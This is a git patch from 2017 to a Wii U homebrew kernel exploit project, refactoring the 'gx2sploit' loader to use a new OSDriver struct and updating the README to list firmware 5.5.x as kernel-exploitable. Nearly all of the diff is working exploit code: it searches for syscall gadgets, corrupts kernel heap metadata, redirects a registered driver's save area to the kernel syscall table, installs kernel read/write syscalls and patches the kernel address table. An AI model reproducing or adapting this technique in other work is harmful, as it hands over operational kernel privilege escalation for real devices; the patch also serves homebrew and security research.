From 57ae89ec2d08300f702fd3161b774faddf0885ad Mon Sep 17 00:00:00 2001
From: NexoCube <nexocube@gmail.com>
Date: Sat, 18 Mar 2017 13:09:32 +0100
Subject: [PATCH] Updated Kernel Exploit (added OSDriver struct)

thx to plutoo for his public notes
---
 Readme.MD                     | 2 +-
 kernel/gx2sploit/src/loader.c | 8 ++++----
 kernel/osdriver/src/loader.c  | 2 +-
 libwiiu/src/coreinit.h        | 8 ++++++++
 4 files changed, 14 insertions(+), 6 deletions(-)

diff --git a/Readme.MD b/Readme.MD
index 13692d4..7518383 100755
--- a/Readme.MD
+++ b/Readme.MD
@@ -7,7 +7,7 @@ Right now, almost all firmware versions are compatible:
 * Firmware version 5.3.2 is supported by exploiting a memory corruption bug (CVE-2014-1300).
 * Firmware versions 5.1.1 to 5.3.1 are also supported, but currently unimplemented.
 * Firmware version 5.4.0 is supported.
-* Firmware version 5.5.0/5.5.1 are supported, but only userland.
+* Firmware version 5.5.0/5.5.1 are supported.
 
 ### What's inside? ###
 
diff --git a/kernel/gx2sploit/src/loader.c b/kernel/gx2sploit/src/loader.c
index 056253e..4458962 100755
--- a/kernel/gx2sploit/src/loader.c
+++ b/kernel/gx2sploit/src/loader.c
@@ -43,7 +43,7 @@ void _start()
 
 	/* OSDriver functions */
 	uint32_t reg[] = {0x38003200, 0x44000002, 0x4E800020};
-	uint32_t (*Register)(char *driver_name, uint32_t name_length, void *buf1, void *buf2) = find_gadget(reg, 0xc, (uint32_t) __PPCExit);
+	OSDriver (*Register)(char *driver_name, uint32_t name_length, void *buf1, void *buf2) = find_gadget(reg, 0xc, (uint32_t) __PPCExit);
 	uint32_t dereg[] = {0x38003300, 0x44000002, 0x4E800020};
 	uint32_t (*Deregister)(char *driver_name, uint32_t name_length) = find_gadget(dereg, 0xc, (uint32_t) __PPCExit);
 	uint32_t copyfrom[] = {0x38004700, 0x44000002, 0x4E800020};
@@ -58,7 +58,7 @@ void _start()
 	OSDynLoad_FindExport(gx2_handle, 0, "GX2Flush", &GX2Flush);
 
 	/* Allocate space for DRVHAX */
-	uint32_t *drvhax = OSAllocFromSystem(0x4c, 4);
+	OSDriver *drvhax = OSAllocFromSystem(sizeof(OSDriver), 4);
 
 	/* Set the kernel heap metadata entry */
 	uint32_t *metadata = (uint32_t*) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE));
@@ -128,7 +128,7 @@ void _start()
 	Register(drvname, 6, NULL, NULL);
 
 	/* Modify its save area to point to the kernel syscall table */
-	drvhax[0x44/4] = KERN_SYSCALL_TBL + (0x34 * 4);
+	drvhax->save_area = (uint32_t*)KERN_SYSCALL_TBL + (0x34 * 4);
 
 	/* Use DRVHAX to install the read and write syscalls */
 	uint32_t syscalls[2] = {KERN_CODE_READ, KERN_CODE_WRITE};
@@ -136,7 +136,7 @@ void _start()
 	
 	/* Clean up the heap and driver list so we can exit */
 	kern_write((void*)(KERN_HEAP + STARTID_OFFSET), 0);
-	kern_write((void*)KERN_DRVPTR, drvhax[0x48/4]);
+	kern_write((void*)KERN_DRVPTR, (uint32_t)drvhax->next);
 
 	/* Modify the kernel address table and exit */
 	kern_write(KERN_ADDRESS_TBL + 0x12, 0x31000000);
diff --git a/kernel/osdriver/src/loader.c b/kernel/osdriver/src/loader.c
index 9a8d8fa..42f9ae1 100755
--- a/kernel/osdriver/src/loader.c
+++ b/kernel/osdriver/src/loader.c
@@ -356,7 +356,7 @@ void _main()
 		exitOSScreen(coreinit_handle);
 	}
 	/* Make DRVHAX point to DRVA to ensure a clean exit */
-	kern_write((void*)(drvhax_addr + 0x48), drva_addr);
+	kern_write((void*)(drvhax_addr + 0x48), drva_addr); //drv + 0x48 = next_driver_ptr
 
 	//map (mostly unused) memory area to specific MEM2 region
 #if (VER<410) //start of region on old FWs
diff --git a/libwiiu/src/coreinit.h b/libwiiu/src/coreinit.h
index f381ac6..ac5eb8f 100755
--- a/libwiiu/src/coreinit.h
+++ b/libwiiu/src/coreinit.h
@@ -70,4 +70,12 @@ typedef struct OSContext
     uint32_t srr1;
 } OSContext;
 
+typedef struct OSDriver
+{
+    char name[0x40];
+    uint32_t unk;
+    uint32_t *save_area; //0x44
+    struct OSDriver *next;
+} OSDriver;
+
 #endif /* COREINIT_H */
\ No newline at end of file